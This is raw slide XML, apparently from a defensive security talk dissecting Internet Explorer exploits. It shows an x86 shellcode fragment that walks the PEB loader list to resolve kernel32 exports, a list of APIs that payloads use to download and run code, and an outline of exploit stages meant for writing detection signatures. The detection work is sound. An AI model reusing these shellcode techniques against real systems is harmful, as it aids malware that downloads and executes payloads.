              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:endParaRPr lang="en-US" sz="1122" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9B93424-619C-DC9C-EAFC-48B1FF6D50CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="466301"/>
            <a:ext cx="11239464" cy="501676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="951304" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3200" b="0" kern="1200" cap="none" spc="-51" baseline="0" dirty="0" smtClean="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Exploit Elements: Where Am I? (aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GetPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rounded Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2157526" y="4371579"/>
            <a:ext cx="1321188" cy="3479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36">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427382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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="2"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2" presetClass="entr" presetSubtype="2"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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="5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4" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
      <p:bldP spid="10" grpId="0" animBg="1"/>
      <p:bldP spid="24" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="1" animBg="1"/>
      <p:bldP spid="12"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66088" y="1115905"/>
            <a:ext cx="1865207" cy="2020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36" dirty="0"/>
              <a:t>TEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866088" y="1815358"/>
            <a:ext cx="1865207" cy="23315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0x30: _PEB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1836" dirty="0" err="1"/>
              <a:t>Ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4275314" y="1115905"/>
            <a:ext cx="2486942" cy="202064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36" dirty="0"/>
              <a:t>PEB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4275314" y="1815358"/>
            <a:ext cx="2486942" cy="23315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0xC: _PEB_LDR_DATA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1788371" y="3186396"/>
            <a:ext cx="6217356" cy="3616169"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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eax,dword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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:[00000030h]</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eax,dword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[eax+0Ch]</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esi,dword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[eax+1Ch]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</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eax,dword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[eax+8]</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ebx,eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2040" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRP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esi,dword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[ebx+3Ch]</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esi,dword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[esi+ebx+78h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> add    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0" err="1">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esi,ebx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2040" dirty="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
            </a:endParaRP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edi,dword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[esi+20h]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2040" dirty="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1555221" y="6680622"/>
            <a:ext cx="6450506" cy="286306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1224" dirty="0"/>
              <a:t>http://www.hick.org/code/skape/papers/win32-shellcode.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306274" y="1115905"/>
            <a:ext cx="1865207" cy="20206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836" dirty="0"/>
              <a:t>_PEB_LDR_DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1836" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7306274" y="1713539"/>
            <a:ext cx="1865207" cy="77340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0x1C: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>InInitialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>OrderModuleList</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Straight Arrow Connector 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="4" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3731295" y="1193623"/>
            <a:ext cx="466302" cy="7383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V="1">
            <a:off x="6762255" y="1193623"/>
            <a:ext cx="466302" cy="7383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Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249198" y="3369697"/>
            <a:ext cx="1398905" cy="6217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28" dirty="0"/>
              <a:t>NTDLL.DLL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249198" y="4146866"/>
            <a:ext cx="1398905" cy="6217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28" dirty="0"/>
              <a:t>KERNEL32.DLL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9249198" y="4924036"/>
            <a:ext cx="1398905" cy="6217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28" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Arc 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8238877" y="2048509"/>
            <a:ext cx="2020641" cy="2176074"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16163432"/>
              <a:gd name="adj2" fmla="val 583655"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>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836"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58163BFB-2DBA-EBAD-077C-705A21A6F94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="466301"/>
            <a:ext cx="11239464" cy="501676"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="951304" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="3200" b="0" kern="1200" cap="none" spc="-51" baseline="0" dirty="0" smtClean="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Exploit Elements: Resolve APIs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D09D710-FD7F-4BD5-EA0B-4161E30DCF07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10679697" y="2900371"/>
            <a:ext cx="1646583" cy="2492990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Typical APIs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>CloseHandle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>CreateFileMappingA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>CreateProcessA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>GetFileSize</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>GetTempPathA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>ReadFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>SetFilePointer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>URLDownloadToFileA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>WinExec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>WriteFile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3595337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1" presetClass="entr" presetSubtype="0" fill="hold"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8">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8">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>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8">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>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
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>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
                                            <p:txEl>
                                              <p:pRg st="8" end="8"/>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
                                            <p:txEl>
                                              <p:pRg st="9" end="9"/>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
                                            <p:txEl>
                                              <p:pRg st="10" end="10"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:se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6" grpId="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" animBg="1"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>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9361" y="1429073"/>
            <a:ext cx="4429238" cy="5206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latin typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2059" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="17842"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="837542" y="6279557"/>
            <a:ext cx="4421058" cy="339964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Title 32"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bones of the Skeleton</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5414012" y="1254918"/>
            <a:ext cx="6526976" cy="4708981"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="932563"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t>Every IE Exploit had these components:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="932563">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> Control Hijack (Vuln) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932563"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t>Shellcode:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" defTabSz="932563">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t>NOP Sled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="932563">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> GetPC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="932563">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t> Resolve APIs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932563"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2000" dirty="0"/>
              <a:t>5a. Download Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="932563"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>5b. Extract and run Payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="932563">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="932563">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Treat these elements as the “Skeleton Bones” to find.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="932563">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Signature them and if we only find some, we know we have a new “bone”. E.g.:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" defTabSz="932563">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" defTabSz="932563">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>GetPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> without API resolver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> new Encoder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" defTabSz="932563">
              <a:buAutoNum type="alphaLcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Shellcode without Control Hijack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>0day </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Rectangle 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1917244" y="1584484"/>
            <a:ext cx="3108237" cy="3108237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">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932563"/>
            <a:endParaRPr lang="en-US" sz="1836">
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:latin typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="78" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3016228" y="1662191"/>
            <a:ext cx="843665" cy="932471"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
